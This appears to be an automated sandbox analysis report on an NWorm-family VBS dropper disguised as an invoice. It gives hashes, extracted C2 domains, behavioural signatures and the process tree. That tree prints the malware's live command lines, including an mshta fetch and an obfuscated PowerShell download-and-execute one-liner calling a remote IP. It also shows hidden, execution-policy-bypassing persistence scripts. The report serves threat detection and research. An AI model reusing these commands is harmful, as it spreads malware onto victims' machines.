Overview

overview

10

Static

static

GBTVHWQCB_...AS.vbs

windows7_x64

10

GBTVHWQCB_...AS.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    139s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    23-02-2022 11:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    GBTVHWQCB_INVOICE#07JDKAS.vbs

  • Size

    4KB

  • MD5

    d546eb292c17626af658e34ffa402e47

  • SHA1

    f0a379ae37a860a6c082464f4a41cd474a5f4cbe

  • SHA256

    adf6d30e5c3767c268a66aa887dff2ebe4d0295c49c9bc42d343b6dd0e707825

  • SHA512

    e15402e69ca3e2391a63fec1a718524bc0841e49b0c954162696d96cd11c04d82a5daad52a5fafe1c9101922ab0cc3bd26892038d8ae4f6cd1c9220634b37048

Score
10/10
nwormdownloaderworm

Malware Config

Extracted

Family

nworm

Version

v0.3.8

C2

nyanmoj.duckdns.org:5057

moneyhope81.duckdns.org:5057
Mutex

cb2d3cba

Signatures

  • NWorm

    A TrickBot module used to propagate to vulnerable domain controllers.

    wormdownloadernworm
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GBTVHWQCB_INVOICE#07JDKAS.vbs"
    1⤵
      PID:2912
    • C:\Windows\system32\msHta.exe
      msHta.exe Http://3.145.46.6/K/EncKAO.txt
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HCNPXUQJCLATJSNVPNHGASK = '[*4@!-95&[27011]{{<!4(}y*4@!-95&[27011]{{<!4(}t3{{!{39=335@-#%2^${![292#\&3/-4=3%^]+\@8_#2}.IO.*4@!-95&[27011]{{<!4(}t()&/@+/6!@3=1*&#^285<53{{!{39=335@-#%2^${![25_8%0=^\09<276{[=(-\-{92#\&3/-4=3%^]+\@8_#2}()&/@+/6!@3=1*&#^285<53{{!{39=335@-#%2^${![25_8%0=^\09<276{[=(-\-{d3{{!{39=335@-#%2^${![2()&/@+/6!@3=1*&#^285<5]'.Replace('*4@!-95&[27011]{{<!4(}','S').Replace('3{{!{39=335@-#%2^${![2','E').Replace('()&/@+/6!@3=1*&#^285<5','R').Replace('5_8%0=^\09<276{[=(-\-{','A').Replace('92#\&3/-4=3%^]+\@8_#2}','M');$HWBPFQSKIJPSNVWGRPDVWTQ = ($HCNPXUQJCLATJSNVPNHGASK -Join '')|&('I'+'EX');$HVVGCGZUOWJPPVKKFNXPRYX = '[-<@!(_!_@2#@@73#6#<*68y-<@!(_!_@2#@@73#6#<*6834^%[/28$^_^1)_+%&$}{2/=+\6{8&8!=%9$&6%0#$!1m.N/=+\6{8&8!=%9$&6%0#$!134^%[/28$^_^1)_+%&$}{2.W/=+\6{8&8!=%9$&6%0#$!1bR/=+\6{8&8!=%9$&6%0#$!1qu/=+\6{8&8!=%9$&6%0#$!1-<@!(_!_@2#@@73#6#<*6834^%[/28$^_^1)_+%&$}{2]'.Replace('-<@!(_!_@2#@@73#6#<*68','S').Replace('/=+\6{8&8!=%9$&6%0#$!1','E').Replace('34^%[/28$^_^1)_+%&$}{2','T');$HZSWCZCRBXDIWQKWTESQTIY = ($HVVGCGZUOWJPPVKKFNXPRYX -Join '')|&('I'+'EX');$HFJRRSZDESQZWRCXANLTRDS = '\=)9&+81%{23</-^[/=-[6r7-{)&9)1(!_(2]+86%-(=5a+8#6&}]%/5}-^]%]5<#$7+7-{)&9)1(!_(2]+86%-(=5'.Replace('\=)9&+81%{23</-^[/=-[6','C').Replace('7-{)&9)1(!_(2]+86%-(=5','E').Replace('+8#6&}]%/5}-^]%]5<#$7+','T');$HWCLNHXSDRQHGEGSDTPUANI = '$#][}(-9<9$33&7@-{54#^-0@}{9!{69/<}19_19+_5&tR-0@}{9!{69/<}19_19+_5&0$}\+-8(030\)(%<}^/736pon0$}\+-8(030\)(%<}^/736-0@}{9!{69/<}19_19+_5&'.Replace('$#][}(-9<9$33&7@-{54#^','G').Replace('-0@}{9!{69/<}19_19+_5&','E').Replace('0$}\+-8(030\)(%<}^/736','S');$HUNOTPOSFQRHVLUSSYXPQCA = 'G_]@_61$7+/%50=7%)5}$+*t(#(&<<]#_^68#}}%]-#61#_]@_61$7+/%50=7%)5}$+*43=743-[#=!81/<[(**(<[pon43=743-[#=!81/<[(**(<[_]@_61$7+/%50=7%)5}$+*43=743-[#=!81/<[(**(<[t(#(&<<]#_^68#}}%]-#61#_]@_61$7+/%50=7%)5}$+*am'.Replace('43=743-[#=!81/<[(**(<[','S').Replace('_]@_61$7+/%50=7%)5}$+*','E').Replace('(#(&<<]#_^68#}}%]-#61#','R');$HHGZUQOYZVBAZGKFOKONHQP = '{[)9)4\#-&640<2_1%000//30#)6832^&7)=]=!{%8-_a20&[#8=\]=4}\*/8^-5_^+To/30#)6832^&7)=]=!{%8-_n20&[#8=\]=4}\*/8^-5_^+'.Replace('{[)9)4\#-&640<2_1%000/','R').Replace('/30#)6832^&7)=]=!{%8-_','E').Replace('20&[#8=\]=4}\*/8^-5_^+','D');&('I'+'EX')($HWBPFQSKIJPSNVWGRPDVWTQ::new($HZSWCZCRBXDIWQKWTESQTIY::$HFJRRSZDESQZWRCXANLTRDS('HttP://3.145.46.6/K/ServerFAH.txt').$HWCLNHXSDRQHGEGSDTPUANI().$HUNOTPOSFQRHVLUSSYXPQCA()).$HHGZUQOYZVBAZGKFOKONHQP())
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3364
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\LZAVOBYIRFWZQZVCTGHPQB.ps1
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2444
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\LZAVOBYIRFWZQZVCTGHPQB.vbs"
            4⤵
              PID:1588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\LZAVOBYIRFWZQZVCTGHPQB.bat
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:3184
        • C:\Windows\system32\cmd.exe
          cMd.E"x"e /c =PoWerShelL"."eXe -noe -nop -nonI -WIndoWSTYLe Hidden -executionPolicy Bypass -file C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\WZQNBDSLVGAWPUXJRUVDYE.ps1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PoWerShelL"."eXe -noe -nop -nonI -WIndoWSTYLe Hidden -executionPolicy Bypass -file C:\ProgramData\LZAVOBYIRFWZQZVCTGHPQB\WZQNBDSLVGAWPUXJRUVDYE.ps1
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3828
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              4⤵
                PID:2100

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2100-167-0x0000000000400000-0x000000000040A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/2100-173-0x0000000005220000-0x0000000005286000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2100-172-0x00000000057D0000-0x0000000005D74000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/2100-171-0x0000000005180000-0x000000000521C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/2100-170-0x00000000050D0000-0x00000000050D1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2100-169-0x000000007464E000-0x000000007464F000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2444-168-0x0000016B34778000-0x0000016B3477A000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2444-152-0x0000016B34776000-0x0000016B34778000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2444-151-0x0000016B34773000-0x0000016B34775000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2444-150-0x0000016B34770000-0x0000016B34772000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2444-149-0x00007FFAFCDB3000-0x00007FFAFCDB5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3364-140-0x000001A0619C3000-0x000001A0619C5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3364-135-0x000001A061750000-0x000001A061772000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3364-138-0x00007FFAFCDB3000-0x00007FFAFCDB5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3364-139-0x000001A0619C0000-0x000001A0619C2000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3364-141-0x000001A0619C6000-0x000001A0619C8000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3828-165-0x000002C6D68B6000-0x000002C6D68B8000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3828-166-0x000002C6D6D50000-0x000002C6D6D6A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/3828-164-0x000002C6D68B3000-0x000002C6D68B5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3828-163-0x000002C6D68B0000-0x000002C6D68B2000-memory.dmp

          Filesize

          8KB

          Download

        • memory/3828-162-0x00007FFAFCDB3000-0x00007FFAFCDB5000-memory.dmp

          Filesize

          8KB

          Download